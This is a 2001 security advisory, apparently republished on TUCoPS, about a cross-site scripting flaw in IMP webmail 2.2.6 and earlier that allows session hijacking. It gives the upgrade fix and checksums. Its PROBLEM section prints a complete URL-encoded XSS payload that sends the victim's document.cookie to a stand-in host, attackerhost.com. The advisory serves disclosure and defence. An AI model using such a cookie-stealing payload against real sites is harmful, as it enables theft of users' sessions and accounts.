12th Nov 2001 [SBWID-4852]
COMMAND
IMP
SYSTEMS AFFECTED
IMP 2.2.6 and lower
Not vulnerable : 2.2.7, dev versions 2.3 and 3.0
PROBLEM
João Pedro Gonçalves found that it\'s possible to hijack an IMP webmail
session using a cross-site script attack, quite similar to the one
explored by Marc Slemko in his \"Microsoft Passport to Trouble\" paper
(http://alive.znep.com/~marcs/passport/)
To exploit this vulnerability using a text message, the attacker sends
an email with a url, where if the user clicks, is redirected to
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A
which in return redirects the user\'s browser to the attacker\'s server
where he hijacks the cookies that the browser used in the context of
the webmail site, and the session therefore.
SOLUTION
Upgrade to 2.2.7
Packages can be found on :
ftp://ftp.horde.org/pub/horde/
ftp://ftp.horde.org/pub/imp/
MD5 checksums:
2433ed0e67739c41021b1a9397130a96 horde-1.2.7.tar.gz
b5c683e1dc862fd185c9be0ce7188894 imp-2.2.7.tar.gz
818199bc9a92cff07d109c4b43a22ffe patch-horde-1.2.6-1.2.7.gz
556ddcabc72048ae53f4cfb00680e6f5 patch-imp-2.2.6-2.2.7.gz
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH